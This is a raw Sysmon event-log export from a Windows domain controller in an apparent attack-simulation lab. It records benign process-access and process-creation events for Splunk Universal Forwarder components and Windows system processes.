Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.385{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.198{59A5CD1D-9542-6005-5805-00000000A301}60446120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.042{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:47.091{59A5CD1D-9542-6005-5905-00000000A301}36884908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.869{59A5CD1D-9544-6005-5B05-00000000A301}64005692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 